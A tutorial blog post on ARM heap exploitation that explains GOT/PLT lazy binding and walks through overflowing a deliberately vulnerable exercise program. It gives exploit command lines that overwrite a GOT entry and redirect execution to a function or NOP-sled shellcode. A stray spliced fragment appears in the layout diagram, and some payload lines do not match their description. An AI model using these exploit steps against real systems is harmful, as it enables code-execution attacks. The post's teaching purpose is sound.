Introduction to exploit development - Part 4: Heap overflows

Nov 3, 2025

#security #exploit-development #systems #ARM #heap #GOT #linux

Overview

In Part 2 and Part 3, we explored stack-based vulnerabilities. Specifically focusing on buffer overflows that corrupt saved return addresses and enable shellcode execution. The stack's predictable structure (return addresses stored adjacent to buffers) makes exploitation relatively straightforward (well, not really, don't forget we had ASLR and stack canaries disabled).

Heap-based vulnerabilities is another avenue to exploit, albeit with different challenges. The heap lacks the convenient saved return addresses of the stack, requiring alternative techniques to achieve code execution. This post explores heap exploitation on ARM, covering:

Heap memory allocation and management
Differences between stack and heap memory regions
The Global Offset Table (GOT) and Procedure Linkage Table (PLT)
Exploiting heap overflows to overwrite GOT entries
Hijacking control flow via function pointer corruption

All work below uses the ARM environment (Debian armhf VM or Raspberry Pi) configured in Part 1.

Understanding the heap

The heap is a memory region for dynamic allocation - memory requested at runtime rather than compile time. Unlike stack frames that are automatically managed by function calls and returns, heap memory must be explicitly allocated and freed by the program.

Heap vs. stack

Key differences:

Aspect	Stack	Heap
Allocation	Automatic (compile-time known allocations, function calls, etc)	Manual (`malloc`, `calloc`)
Deallocation	Automatic (function return)	Manual (`free`)
Scope	Local to function	Global (accessible via pointers)
Growth direction	Downward (high → low addresses)	Upward (low → high addresses)
Fragmentation	No fragmentation	Can fragment with allocation/deallocation patterns
Overflow target	Saved return address, frame pointer	Adjacent heap chunks, metadata, function pointers

Heap allocation in C

Functions for heap management:

malloc(size): Allocates size bytes, returns pointer to allocated memory
calloc(count, size): Allocates and zero-initializes count * size bytes
realloc(ptr, size): Resizes previously allocated memory
free(ptr): Deallocates memory, returning it to the heap for reuse

Example:

#include <stdlib.h>

int main() {
    // Allocate 100 bytes on heap
    char *buffer = malloc(100);
    // Use the memory
    strcpy(buffer, "Hello, heap!");
    // Free when done
    free(buffer);
    return 0;
}

Memory fragmentation

A common heap issue is fragmentation. Consider this allocation sequence:

char *a = malloc(100);  // Allocate A
char *b = malloc(100);  // Allocate B
char *c = malloc(100);  // Allocate C

free(b);                // Free B (creates hole between A and C)

After freeing b, there's a 100-byte gap between a and c. If we later request 200 bytes, the allocator can't use this gap, leading to fragmentation. Different malloc implementations (dlmalloc, ptmalloc, jemalloc) handle fragmentation differently with varying performance tradeoffs.

Locating the heap in memory

To get a sense of heap placement, we can write a simple program to show us the memory addresses of variables allocated on the heap and stack:

hello.c

#include <stdio.h>
#include <stdlib.h>

int main() {
    char *heap_var = malloc(100);
    char stack_var[100];

    printf("Heap variable at: %p\n", heap_var);
    printf("Stack variable at: %p\n", stack_var);

    free(heap_var);
    return 0;
}

Compile and debug:

gcc hello.c -o hello
./hello
# Heap variable at: 0x403190
# Stack variable at: 0xbefff450

As mentioned, the heap starts at a much lower address (e.g., 0x00402000) than the stack (e.g., 0xbefdf000), and grows upward toward higher addresses.

Controlling execution flow via heap corruption

Stack overflows target saved return addresses conveniently located on the stack. Heap overflows require different targets. Common techniques:

Function pointer overwriting: If structures on the heap contain function pointers, overflowing into those pointers redirects execution
Virtual table (vtable) corruption: In some languages, we can overwrite object vtables to hijack virtual function calls
Global Offset Table (GOT) overwriting: Corrupt GOT entries to redirect library function calls
Heap metadata corruption: Exploit allocator metadata to achieve arbitrary writes

This post focuses on GOT overwriting, as it's powerful and demonstrates key concepts applicable to other techniques.

The Global Offset Table (GOT) and Procedure Linkage Table (PLT)

Modern programs use dynamic linking - they don't contain copies of library code (like printf, malloc, etc.). Instead, the dynamic linker (ld-linux.so) resolves library function addresses at runtime and stores them in the Global Offset Table.

Why dynamic linking?

Benefits:

Smaller binaries: No need to include library code in each executable
Shared libraries: Multiple programs share one copy of libc in memory
Security updates: Updating libc fixes vulnerabilities in all programs that use it

Cost:

Performance overhead: First call to a function requires symbol resolution
Complexity: Additional indirection through GOT/PLT

Lazy binding optimization

To reduce startup time, dynamic linking uses lazy binding - library functions are resolved only when first called, not at program startup. This is implemented via the Procedure Linkage Table (PLT) and Global Offset Table (GOT).

The PLT contains stubs that:

Check if the function has been resolved (by checking GOT)
If not resolved, call the dynamic linker to resolve it
If resolved, jump directly to the function

The GOT stores the actual addresses of resolved functions.

Dissecting heap1.c

To gain some understanding, let's trace a call to puts() through the PLT and GOT. Take the following program:

heap1.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {
    char *str = malloc(20);
    strcpy(str, "Hello, world!");
    puts(str);
    free(str);
    return 0;
}

Compile:

gcc heap1.c -fno-stack-protector -o heap1

Examine sections:

readelf -S heap1

Look for:

.plt section: Contains PLT stubs (starts at 0x000003f8 in our example)
.got section: Contains GOT entries (starts at 0x00002000 in our example)

View relocations (GOT entries):

readelf -r heap1

Output shows function offsets from GOT base:

Offset     Info    Type            Sym.Value  Sym. Name
00002014  00000616 R_ARM_JUMP_SLOT   00000000   free@GLIBC_2.4
00002018  00000716 R_ARM_JUMP_SLOT   00000000   puts@GLIBC_2.4
0000201c  00000816 R_ARM_JUMP_SLOT   00000000   malloc@GLIBC_2.4

This tells us puts is at offset 0x2018 (GOT base is 0x2000, so offset is 0x18).

Tracing GOT/PLT with GDB

Disassemble main:

gdb ./heap1
(gdb) disassemble main

Find the puts call (something like blx 0x430 <puts@plt>). This branches to the PLT stub. Disassemble the PLT stub:

(gdb) disassemble 0x430

Output (example for ARM):

0x00000430 <+0>:	add	r12, pc, #0, 12
0x00000434 <+4>:	add	r12, r12, #4096	@ 0x1000
0x00000438 <+8>:	ldr	pc, [r12, #3040]!	@ 0xbe0

These instructions calculate the GOT address for puts and load it into the program counter (PC). The calculation takes PC at execution (which is 0x438 due to ARM's 8-byte prefetching pipeline offset) + 0x1000 + 0xbe0. This matches the GOT entry we found with readelf above (0x2018)!

Next let's set a breakpoint and examine the actual GOT address. It's important to note that the GOT offset we see above is an offset from the start of our program:

(gdb) break main
(gdb) run
(gdb) info proc mappings # Shows that program memory starts at 0x400000
(gdb) x/x 0x400000 + 0x2018
0x402018 <puts@got.plt>:	0x004003f8

The GOT initially contains 0x004003f8 - an address back into the PLT. This is that "lazy binding" mechanism. On first call:

PLT jumps to address in GOT (0x004003f8)
That address points back to PLT code that calls the dynamic linker
Dynamic linker resolves puts and updates GOT with real address
Future calls to puts jump directly to the real function

Continue execution past the puts call, then examine GOT again:

(gdb) b *main+50
(gdb) continue
[Program prints "Hello, world!"]
(gdb) x/x 0x400000 + 0x2018
0x402018 <puts@got.plt>:	0xb6f0f339

Now the GOT contains the real address of puts in libc (0xb6f0f339)!

Exploiting heap2.c

So what if we can overwrite a GOT entry before the function is called? This should allow us to redirect execution to our shellcode or another function. Let's try it!

This time we'll look at a deliberately vulnerable program (from exploit-exercises.com)) to demonstrate heap overflow via GOT overwrite.

heap2.c

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <time.h>

struct internet {
    int priority;
    char *name;
};

void winner() {
    printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv) {
    struct internet *i1, *i2, *i3;

    i1 = malloc(sizeof(struct internet));
    i1->priority = 1;
    i1->name = malloc(8);

    i2 = malloc(sizeof(struct internet));
    i2->priority = 2;
    i2->name = malloc(8);

    i3 = malloc(sizeof(struct internet));
    i3->priority = 3;
    i3->name = malloc(8);

    strcpy(i1->name, argv[1]);  // Vulnerable: no bounds checking
    strcpy(i2->name, argv[2]);  // Vulnerable: no bounds checking

    printf("and that's a wrap folks!\n");
}

Compile:

gcc heap2.c -fno-stack-protector -o heap2

Understanding the vulnerability

Three internet structures are allocated on the heap, each containing an integer and a pointer to a separately allocated string. The strcpy invocations copy command-line arguments without bounds checking.

Memory layout after allocations:

[i1 structure: priority, name pointer]
[i1->name: 8-byte buffer]
[i2 structure: priority, name pointer]
[i2->name: 8-byte buffer]
[i3 structure: priority, ngdb ./heap2ame pointer]
[i3->name: 8-byte buffer]

If argv[1] exceeds 8 bytes, we overflow i1->name into adjacent heap memory. We can potentially overwrite:

The i2 structure itself
Specifically, the i2->name pointer

If we overwrite i2->name with the address of a GOT entry, the second strcpy(i2->name, argv[2]) will write argv[2] to that GOT entry!

Step 1: Finding the overflow offset

Use GDB with a pattern to determine how many bytes are needed to reach the i2->name pointer:

gdb ./heap2
(gdb) break strcpy
(gdb) run AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH XXXX
(gdb) continue  # hit second strcpy
(gdb) x/s $r0
0x46464646:	<error: Cannot access memory at address 0x46464646>

The error reveals that i2->name was overwritten with 0x46464646, which is "FFFF" in ASCII - bytes 21-24 of our input. This means we need 20 bytes of padding followed by the 4-byte address we want to write into i2->name.

We can also calculate this from the struct layout:

i1->name buffer:     8 bytes
heap metadata:       8 bytes
i2->priority:        4 bytes
------------------------
Total to i2->name:  20 bytes

Step 2: Identifying the GOT target

We want to overwrite the GOT entry for puts (the last function called).

First, find the relocation offset using readelf:

readelf -r heap2 | grep puts
# 00002020  00000916 R_ARM_JUMP_SLOT   00000000   puts@GLIBC_2.4

This shows the GOT entry is at offset 0x2020. To get the actual runtime address, we need to add the program's base address:

gdb ./heap2
(gdb) break main
(gdb) run
(gdb) info proc mappings

Look for the first mapping of the binary - this is the base address:

Start Addr   End Addr       Size     Offset  Perms   objfile
  0x400000   0x401000     0x1000        0x0  r-xp   /home/user/heap2

Combining the two above, we now know that the GOT entry for puts is at 0x400000 + 0x2020 = 0x402020.

Step 3: Finding the winner() function

The program contains a winner() function that never gets called. We'll redirect puts to winner():

(gdb) print winner
$1 = {<text variable, no debug info>} 0x4005b4 <winner>

Winner is at 0x4005b4. Since this is ARM Thumb code, we need to set the LSB to 1 for proper execution, giving us 0x4005b5.

Step 4: Crafting the exploit

Payload structure:

First argument: 20 bytes of padding + GOT address of puts (little-endian)
Second argument: Address of winner() (little-endian)

The first strcpy overwrites i2->name with the GOT address. The second strcpy writes the winner() address to that GOT entry.

Exploit:

./heap2 "$(printf 'AAAAAAAAAAAAAAAAAAAA\x20\x20\x40')" "$(printf '\xb5\x05\x40')"

Note the quotes around each $(printf ...), these are necessary because \x20 is a space character, and without quotes the shell would split the argument (I found this out the hard way >.>). Also, as mentioned, since this is ARM Thumb code, we set the LSB of the winner address (0x4005b5 instead of 0x4005b4) to ensure proper Thumb mode execution. The \x00 bytes complete the 4-byte addresses in little-endian format.

When executed, the program should print "and we have a winner @ [timestamp]" instead of "and that's a wrap folks!", proving we've successfully redirected puts to winner().

Step 5: Escalating to shellcode execution

Instead of calling winner(), we can redirect to shellcode stored in an environment variable. We'll use the NOP sled technique from Part 3 to make this more reliable.

First, we'll need to cheat a bit and recompile to allow an executable stack like before:

gcc heap2.c -fno-stack-protector -z execstack -o heap2

Then using the nop.py helper script from Part 3, export shellcode with a NOP sled:

export SHELLCODE=$(./nop.py shellcode -a arm 1000)

The NOP sled creates a large landing zone, eliminating the need for precise address calculation. Environment variable addresses shift based on program name length and other factors - the sled compensates for this uncertainty.

Now exploit using the SHELLCODE address:

./heap2 "$(printf 'AAAAAAAAAAAAAAAAAAAA\x20\x20\x40')" "$(./nop.py buffer SHELLCODE ./heap2 4)"

The nop.py buffer subcommand automatically:

Finds the SHELLCODE environment variable address
Compensates for program name length differences
Adds an offset to land in the middle of the NOP sled
Outputs the address in little-endian format

This redirects puts to our shellcode and then...unexpectedly FAILS. WHAT!?

It turns out that since I originally worked on this content in 2019, the security mechanisms provided by the Linux kernel have improved. Previously, setting an executable stack via -z execstack applied to all memory mappings, including the heap; but this seems to have been fixed. On ARM, this is now properly enforced at the hardware level via the XN (Execute Never) bit. I leave it as an exercise to the reader to figure out how to properly exploit this ;).

Modern heap exploitation challenges and techniques

As you can see, heap exploitation is generally more difficult than stack exploitation. In this post, we took one of the simplest examples possible, and look just how complicated it got. The reason for this is due to several reasons, for example:

No convenient targets: Unlike stacks (return addresses), heaps don't have predictable control flow targets
Allocator complexity: Different malloc implementations have different metadata layouts and corruption detection
Heap layout variability: Allocation order and sizes affect memory layout unpredictably
Modern mitigations: Heap-specific protections (safe unlinking, malloc metadata integrity checks)
- There have been major advances here, which is why the last step for executing shellcode likely didn't work anymore. Blue team is doing a great job here!

The basic GOT overwriting via heap overflow that we covered is just one technique, modern heap exploitation goes deep and includes techniques such as:

Use-after-free (UAF): Accessing freed memory that has been reallocated. If the reallocated chunk contains attacker-controlled data, this can hijack function pointers or vtables.

Double-free: Freeing the same memory twice corrupts allocator metadata, potentially enabling arbitrary writes.

Heap spraying: Allocate many objects containing shellcode to increase likelihood of execution jumping to shellcode.

Tcache poisoning (glibc 2.26+): Corrupt tcache (per-thread cache) metadata to achieve arbitrary writes.

Fastbin dup: Exploit fastbin (small chunk cache) by creating duplicate entries, allowing overlapping allocations.

These techniques exploit allocator internals and require deep understanding of implementation details (ptmalloc2 for glibc, jemalloc, etc.). You're on your own for understanding these, I just helped dip your pinky toe into this complicated sea.

Conclusion

Heap exploitation requires understanding dynamic memory management, GOT/PLT mechanisms, and careful memory layout manipulation. We've demonstrated:

Heap allocation basics and memory layout
How GOT/PLT enable dynamic linking with lazy binding
Overflowing heap buffers to corrupt adjacent chunk pointers
Redirecting GOT entries to arbitrary functions or shellcode

The techniques shown here are foundational; understanding heap layouts, GOT mechanics, and pointer corruption provides the groundwork for more advanced exploitation. That being said, modern heap techniques will require deep research and efforts, which I leave to dear reader. I hope this post at least demonstrates that heap exploitation, while intricate, follows logical patterns once you understand the underlying memory management.

With that, this post concludes our exploration of fundamental exploitation techniques. We've progressed from basic stack overflows through position-independent shellcode to heap-based control flow hijacking. In the epilogue, we'll summarize what we've learned, discuss techniques we didn't cover, and explore paths forward for continued learning in binary exploitation and systems security.

References

The Shellcoder's Handbook - Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte
Heap exploitation on ARM - Aditya Gupta
LiveOverflow: How to exploit a Heap Overflow
Protostar heap1 - exploit-exercises.com
Understanding the heap: Global Offset Table
Understanding the heap: Procedure Linkage Table
Heap Memory in C Programming - Stack Overflow